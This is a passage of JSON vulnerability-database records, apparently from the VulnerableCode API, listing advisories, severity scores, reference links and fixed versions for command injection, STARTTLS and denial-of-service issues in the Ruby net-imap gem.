de007d9fbce42c"},{"reference_url":"https://github.com/ruby/net-imap/commit/f79d35bf5833f186e81044c57c843eda30c873da","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-12T02:29:05Z/"}],"url":"https://github.com/ruby/net-imap/commit/f79d35bf5833f186e81044c57c843eda30c873da"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.3.10","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-12T02:29:05Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.3.10"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-12T02:29:05Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-12T02:29:05Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4"},{"reference_url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2026-42246.yml","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2026-42246.yml"},{"reference_url":"https://nostarttls.secvuln.info","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nostarttls.secvuln.info"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42246","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42246"},{"reference_url":"https://www.rfc-editor.org/info/rfc8314","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.rfc-editor.org/info/rfc8314"},{"reference_url":"https://github.com/advisories/GHSA-vcgp-9326-pqcp","reference_id":"GHSA-vcgp-9326-pqcp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vcgp-9326-pqcp"},{"reference_url":"https://github.com/ruby/net-imap/security/advisories/GHSA-vcgp-9326-pqcp","reference_id":"GHSA-vcgp-9326-pqcp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-12T02:29:05Z/"}],"url":"https://github.com/ruby/net-imap/security/advisories/GHSA-vcgp-9326-pqcp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1089666?format=json","purl":"pkg:gem/net-imap@0.3.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.10"},{"url":"http://public2.vulnerablecode.io/api/packages/1089665?format=json","purl":"pkg:gem/net-imap@0.4.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.24"},{"url":"http://public2.vulnerablecode.io/api/packages/1089660?format=json","purl":"pkg:gem/net-imap@0.5.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.14"},{"url":"http://public2.vulnerablecode.io/api/packages/1089663?format=json","purl":"pkg:gem/net-imap@0.6.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.6.4"}],"aliases":["CVE-2026-42246","GHSA-vcgp-9326-pqcp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gsp4-pq1s-jkbw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/355854?format=json","vulnerability_id":"VCID-jwy5-uf6y-j7ae","summary":"net-imap vulnerable to command Injection via \"raw\" arguments to multiple commands","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42257.json","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42257.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42257","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06153","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06146","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06145","published_at":"2026-05-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42257"},{"reference_url":"https://github.com/ruby/net-imap","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap"},{"reference_url":"https://github.com/ruby/net-imap/commit/0ec4fd351263e8b9a4f683713427827b7b1ad974","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/commit/0ec4fd351263e8b9a4f683713427827b7b1ad974"},{"reference_url":"https://github.com/ruby/net-imap/commit/47c72186d272441878ca73c9499f66013829ca2f","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/commit/47c72186d272441878ca73c9499f66013829ca2f"},{"reference_url":"https://github.com/ruby/net-imap/commit/6bf02aef7e0b5931010c36e377f79a71636b306b","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/commit/6bf02aef7e0b5931010c36e377f79a71636b306b"},{"reference_url":"https://github.com/ruby/net-imap/commit/a4f7649c3da77dec7631f03a037a478eb4330048","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/commit/a4f7649c3da77dec7631f03a037a478eb4330048"},{"reference_url":"https://github.com/ruby/net-imap/commit/aec06996eb87a7e1bbcef1f9f8926e8add2b8c71","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/commit/aec06996eb87a7e1bbcef1f9f8926e8add2b8c71"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T19:27:16Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T19:27:16Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T19:27:16Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42257","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42257"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2468494","reference_id":"2468494","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2468494"},{"reference_url":"https://github.com/advisories/GHSA-hm49-wcqc-g2xg","reference_id":"GHSA-hm49-wcqc-g2xg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hm49-wcqc-g2xg"},{"reference_url":"https://github.com/ruby/net-imap/security/advisories/GHSA-hm49-wcqc-g2xg","reference_id":"GHSA-hm49-wcqc-g2xg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T19:27:16Z/"}],"url":"https://github.com/ruby/net-imap/security/advisories/GHSA-hm49-wcqc-g2xg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1089665?format=json","purl":"pkg:gem/net-imap@0.4.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.24"},{"url":"http://public2.vulnerablecode.io/api/packages/1089660?format=json","purl":"pkg:gem/net-imap@0.5.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.14"},{"url":"http://public2.vulnerablecode.io/api/packages/1089663?format=json","purl":"pkg:gem/net-imap@0.6.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.6.4"}],"aliases":["CVE-2026-42257","GHSA-hm49-wcqc-g2xg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jwy5-uf6y-j7ae"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/355851?format=json","vulnerability_id":"VCID-rfhh-yjxe-3fds","summary":"net-imap has quadratic complexity when reading response literals","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42245.json","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42245.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42245","reference_id":"","reference_type":"","scores":[{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19246","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19346","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19211","published_at":"2026-05-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42245"},{"reference_url":"https://github.com/ruby/net-imap","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap"},{"reference_url":"https://github.com/ruby/net-imap/commit/6091f7d6b1f3514cafbfe39c76f2b5d73de3ca96","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T17:53:55Z/"}],"url":"https://github.com/ruby/net-imap/commit/6091f7d6b1f3514cafbfe39c76f2b5d73de3ca96"},{"reference_url":"https://github.com/ruby/net-imap/commit/88d95231fc8afef11c1f074453f7d75b68c9dfda","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T17:53:55Z/"}],"url":"https://github.com/ruby/net-imap/commit/88d95231fc8afef11c1f074453f7d75b68c9dfda"},{"reference_url":"https://github.com/ruby/net-imap/commit/de685f91a4a4cc75eb80da898c2bf8af08d34819","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T17:53:55Z/"}],"url":"https://github.com/ruby/net-imap/commit/de685f91a4a4cc75eb80da898c2bf8af08d34819"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T17:53:55Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T17:53:55Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T17:53:55Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4"},{"reference_url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2026-42245.yml","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2026-42245.yml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42245","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42245"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2468495","reference_id":"2468495","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2468495"},{"reference_url":"https://github.com/advisories/GHSA-q2mw-fvj9-vvcw","reference_id":"GHSA-q2mw-fvj9-vvcw","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q2mw-fvj9-vvcw"},{"reference_url":"https://github.com/ruby/net-imap/security/advisories/GHSA-q2mw-fvj9-vvcw","reference_id":"GHSA-q2mw-fvj9-vvcw","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T17:53:55Z/"}],"url":"https://github.com/ruby/net-imap/security/advisories/GHSA-q2mw-fvj9-vvcw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1089665?format=json","purl":"pkg:gem/net-imap@0.4.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.24"},{"url":"http://public2.vulnerablecode.io/api/packages/1089660?format=json","purl":"pkg:gem/net-imap@0.5.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.14"},{"url":"http://public2.vulnerablecode.io/api/packages/1089663?format=json","purl":"pkg:gem/net-imap@0.6.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.6.4"}],"aliases":["CVE-2026-42245","GHSA-q2mw-fvj9-vvcw"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rfhh-yjxe-3fds"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/355853?format=json","vulnerability_id":"VCID-unx7-72n1-2bd4","summary":"net-imap vulnerable to command Injection via unvalidated Symbol inputs","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42258","reference_id":"","reference_type":"","scores":[{"value":"0.00094","scoring_system":"epss","scoring_elements":"0.26065","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00094","scoring_system":"epss","scoring_elements":"0.25985","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00094","scoring_system":"epss","scoring_elements":"0.25967","published_at":"2026-05-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42258"},{"reference_url":"https://github.com/ruby/net-imap","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap"},{"reference_url":"https://github.com/ruby/net-imap/commit/6bf02aef7e0b5931010c36e377f79a71636b306b","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/commit/6bf02aef7e0b5931010c36e377f79a71636b306b"},{"reference_url":"https://github.com/ruby/net-imap/commit/9db3e9d60bfb8f3735ea95015bf8a700f4af9cbb","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/commit/9db3e9d60bfb8f3735ea95015bf8a700f4af9cbb"},{"reference_url":"https://github.com/ruby/net-imap/commit/aec06996eb87a7e1bbcef1f9f8926e8add2b8c71","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/commit/aec06996eb87a7e1bbcef1f9f8926e8add2b8c71"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:57:16Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":